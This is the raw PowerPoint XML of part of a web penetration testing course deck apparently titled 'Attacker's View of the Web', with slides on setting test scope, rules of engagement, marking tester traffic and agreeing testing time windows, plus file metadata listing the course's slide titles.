              <a:t>Scope of the test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Which applications or servers are involved?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>For example, is the ecommerce portion of the application in-scope?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Are there any systems, URLs, or application functions that should be specifically avoided?</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Gathering Information Required </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>for the Test</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116739" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1554480"/>
            <a:ext cx="8534400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Information required before starting the hands-on testing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Applications that are included in scope</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Multiple user IDs and the passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>These IDs should have different access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Technology restrictions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> Various examples such as client types, servers not to touch or ports to stay away from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Emergency contact information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>From both the testing team and target system personnel</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Rules of Engagement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117763" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Before testing can begin, testers and target system personnel must agree on some important Rules of Engagement:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Identifying tester traffic and data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Agreeing upon a testing time frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Establishing a communications plan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Much of this can be found from the scope we discussed before</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a:xfrm>
            <a:off x="685800" y="137160"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Identifying Tester Traffic and Data in the Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118787" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="335280" y="1524000"/>
            <a:ext cx="8458200" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Target system personnel should be able to identify the testers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>' traffic and test data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This makes for far safer testing, and helps establish trust between testers and target system personnel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Source identifiers should be agreed upon and provided to target system personnel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Tester systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>' IP addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>E-mail addresses that will be provided as input to the any e-mail forms used in the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Other identifiers of testers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>' data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Example bogus credit card numbers or social security numbers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Other PII such as government ID numbers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Tester accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>These items are often overlooked, but are vital</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a:xfrm>
            <a:off x="685800" y="152400"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Testing Time Windows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119811" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="381000" y="1259118"/>
            <a:ext cx="8458200" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Agree upon various time windows for testing activities in advance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>How long will the test run?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Set testing windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Business hours?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>12AM through 7AM?  Which time zone?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Time for analysis, reporting, and follow up </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Also ensure that upfront deliverables are scheduled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Information required for the test, provided by target system personnel to testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Support contact information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Final report – always write one to record what you did</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Final presentation, if applicable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="HE_template">
  <a:themeElements>
    <a:clrScheme name="SANS - Template 2012">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="002060"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="002060"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="0070C0"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="00B050"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="993300"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FF3300"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="FFC000"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="000000"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="000000"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="HE_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HE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E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HE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E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E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E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E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HE_template</Template>
  <TotalTime>43129</TotalTime>
  <Words>27128</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>2941</Paragraphs>
  <Slides>150</Slides>
  <Notes>150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150</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="160" baseType="lpstr">
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Lucida Grande</vt:lpstr>
      <vt:lpstr>MS PGothic</vt:lpstr>
      <vt:lpstr>MS PGothic</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>SimSun</vt:lpstr>
      <vt:lpstr>HE_template</vt:lpstr>
      <vt:lpstr>Clip</vt:lpstr>
      <vt:lpstr>Web Penetration Testing and Ethical Hacking Attacker's View of the Web</vt:lpstr>
      <vt:lpstr>Lab Set Up</vt:lpstr>
      <vt:lpstr>Course Outline</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Why the Web?</vt:lpstr>
      <vt:lpstr>Current Web App Security Testing  is Often Limited</vt:lpstr>
      <vt:lpstr>Increased Functionality with Web 2.0</vt:lpstr>
      <vt:lpstr>Cloud-based Applications</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Understanding the Web</vt:lpstr>
      <vt:lpstr>Characteristics of a Solid Web App Pen Test Methodology</vt:lpstr>
      <vt:lpstr>Knowledge of Tools</vt:lpstr>
      <vt:lpstr>Permission to Test</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Web Site Server Architecture Types</vt:lpstr>
      <vt:lpstr>Web Servers</vt:lpstr>
      <vt:lpstr>Dynamic Server Architecture</vt:lpstr>
      <vt:lpstr>Application Server Architecture</vt:lpstr>
      <vt:lpstr>Proxy Server Architecture</vt:lpstr>
      <vt:lpstr>Attacker's Perspective of  Web Site Server Architecture</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>HTTP Protocol</vt:lpstr>
      <vt:lpstr>Example HTTP Request</vt:lpstr>
      <vt:lpstr>User-Agent</vt:lpstr>
      <vt:lpstr>Example HTTP Response</vt:lpstr>
      <vt:lpstr>Uniform Resource Identifier (URIs)</vt:lpstr>
      <vt:lpstr>Query String Formats</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>HTTP Request Methods</vt:lpstr>
      <vt:lpstr>GET/POST/HEAD Methods</vt:lpstr>
      <vt:lpstr>TRACE/OPTIONS Methods</vt:lpstr>
      <vt:lpstr>CONNECT Method</vt:lpstr>
      <vt:lpstr>PUT/DELETE Methods</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>HTTP Status Codes</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>WebSockets</vt:lpstr>
      <vt:lpstr>WebSockets Implementation</vt:lpstr>
      <vt:lpstr>WebSocket Tools</vt:lpstr>
      <vt:lpstr>Attacker's Perspective of HTTP</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Client Authentication</vt:lpstr>
      <vt:lpstr>HTTP Basic Authentication</vt:lpstr>
      <vt:lpstr>HTTP Basic Authentication Illustrated</vt:lpstr>
      <vt:lpstr>Attacker's Perspective of HTTP Basic Authentication</vt:lpstr>
      <vt:lpstr>HTTP Digest Authentication</vt:lpstr>
      <vt:lpstr>HTTP Digest Authentication Illustrated</vt:lpstr>
      <vt:lpstr>Attacker's Perspective of HTTP Digest Authentication</vt:lpstr>
      <vt:lpstr>Integrated Windows Authentication</vt:lpstr>
      <vt:lpstr>Integrated Windows Authentication Illustrated</vt:lpstr>
      <vt:lpstr>Attacker's Perspective of HTTP Integrated Windows Authentication</vt:lpstr>
      <vt:lpstr>Forms-based Authentication</vt:lpstr>
      <vt:lpstr>Pieces of Forms-based Authentication</vt:lpstr>
      <vt:lpstr>Forms-based Authentication Illustrated</vt:lpstr>
      <vt:lpstr>Attacker's Perspective of Forms-based Authentication</vt:lpstr>
      <vt:lpstr>OAuth</vt:lpstr>
      <vt:lpstr>How OAuth Works - Part 1</vt:lpstr>
      <vt:lpstr>How OAuth Works - Part 2</vt:lpstr>
      <vt:lpstr>How OAuth Works – Part 3</vt:lpstr>
      <vt:lpstr>OAuth 1.0</vt:lpstr>
      <vt:lpstr>OAuth 2.0</vt:lpstr>
      <vt:lpstr>Example OAuth Requests</vt:lpstr>
      <vt:lpstr>Attacker's View of OAuth</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Stateless as a Way of Life</vt:lpstr>
      <vt:lpstr>Session Tracking</vt:lpstr>
      <vt:lpstr>Types of Sessions: Client-side vs. Server-side</vt:lpstr>
      <vt:lpstr>Popular Tracking </vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>URI Parameters</vt:lpstr>
      <vt:lpstr>Hidden Form Fields</vt:lpstr>
      <vt:lpstr>Attacker's Perspective of  Session State</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Encrypting HTTP in Transit</vt:lpstr>
      <vt:lpstr>Certificate Trusts</vt:lpstr>
      <vt:lpstr>HTTPS: Attacker Perspective</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>SamuraiWTF</vt:lpstr>
      <vt:lpstr>SamuraiWTF Desktop</vt:lpstr>
      <vt:lpstr>SamuraiWTF within the Class</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Black Box  Penetration Testing</vt:lpstr>
      <vt:lpstr>White Box  Penetration Testing</vt:lpstr>
      <vt:lpstr>Grey Box  Penetration Testing</vt:lpstr>
      <vt:lpstr>Testing Methods:  Manual vs. Automated Testing</vt:lpstr>
      <vt:lpstr>Manual Web App Penetration Testing</vt:lpstr>
      <vt:lpstr>Automated Web App  Penetration Testing</vt:lpstr>
      <vt:lpstr>Hybrid Web App Penetration Testing</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Web App Pen Test Preparation</vt:lpstr>
      <vt:lpstr>Managing a Web App  Penetration Test</vt:lpstr>
      <vt:lpstr>Establishing the Test Scope</vt:lpstr>
      <vt:lpstr>Gathering Information Required  for the Test</vt:lpstr>
      <vt:lpstr>Rules of Engagement</vt:lpstr>
      <vt:lpstr>Identifying Tester Traffic and Data in the Application</vt:lpstr>
      <vt:lpstr>Testing Time Windows</vt:lpstr>
      <vt:lpstr>Communications Planning</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Reporting</vt:lpstr>
      <vt:lpstr>Report Pieces</vt:lpstr>
      <vt:lpstr>1) Executive Summary</vt:lpstr>
      <vt:lpstr>2) Introduction</vt:lpstr>
      <vt:lpstr>3) Methodology</vt:lpstr>
      <vt:lpstr>4) Findings</vt:lpstr>
      <vt:lpstr>5) Conclusions</vt:lpstr>
      <vt:lpstr>Presentation</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Web App Pen Test Methodology</vt:lpstr>
      <vt:lpstr>Reconnaissance</vt:lpstr>
      <vt:lpstr>Mapping</vt:lpstr>
      <vt:lpstr>Discovery</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Cyclical Attack</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Information Leakage Flaws</vt:lpstr>
      <vt:lpstr>Configuration Flaws</vt:lpstr>
      <vt:lpstr>Bypass Flaws</vt:lpstr>
      <vt:lpstr>Injection Flaws</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Why JavaScript for Web App Pen Testers?</vt:lpstr>
      <vt:lpstr>JavaScript</vt:lpstr>
      <vt:lpstr>JavaScript Use in Web Pages</vt:lpstr>
      <vt:lpstr>JavaScript Fundamentals</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Conditional Statements</vt:lpstr>
      <vt:lpstr>Control Statements</vt:lpstr>
      <vt:lpstr>JavaScript Variables</vt:lpstr>
      <vt:lpstr>Functions</vt:lpstr>
      <vt:lpstr>Events</vt:lpstr>
      <vt:lpstr>Using Events in Attacks: Ideas for Pen Testers</vt:lpstr>
      <vt:lpstr>Using Events in Attacks: More Ideas for Pen Testers</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Document Object Model (DOM)</vt:lpstr>
      <vt:lpstr>DOM Nodes</vt:lpstr>
      <vt:lpstr>JavaScript Object Methods and Properties</vt:lpstr>
      <vt:lpstr>Objects and Their Associated Properties &amp; Methods</vt:lpstr>
      <vt:lpstr>Selecting and Changing Content</vt:lpstr>
      <vt:lpstr>Interacting with Cookies</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Asynchronous JavaScript  and XML (AJAX)</vt:lpstr>
      <vt:lpstr>The Mighty XMLHttpRequest</vt:lpstr>
      <vt:lpstr>readyState</vt:lpstr>
      <vt:lpstr>Example Use of XMLHttpRequest: Query Google Using SOAP API</vt:lpstr>
      <vt:lpstr>XMLHttpRequest Diagram</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Course Roadmap</vt:lpstr>
      <vt:lpstr>Conclusion of PEWAPT101.1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PenTesting and Ethical Hacking</dc:title>
  <dc:subject>Attacker's View of the Web</dc:subject>
  <dc:creator>Kevin Johnson</dc:creator>
  <dc:description>processed_12.10.13.rlr (01.14.14.rlr gen rev1 for missing COE - pdf only)
processed_12.21.12.rlr
processed_04.02.12.rlr
processed 061611 rmw
processed 020811 rmw
processed_09.08.10.rlr
processed 05/28/10 rmw
processed 03/10/10 rmw
cooked 070809 rmw - cooked 103009 rmw - 
11/19/09: rev1 is generated by: spacing adjustment to notes on slide 88; grayscale adjustments to slides 16, 17, 18, 19, 20, 22</dc:description>
  <cp:lastModifiedBy>Kevin Johnson</cp:lastModifiedBy>
  <cp:revision>2763</cp:revision>
  <cp:lastPrinted>2013-12-11T16:32:23Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-07-22T19:59:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-01-29T13:28:59Z</dcterms:modified>
  <cp:category>Security</cp:category>
</cp:coreProperties>
</file>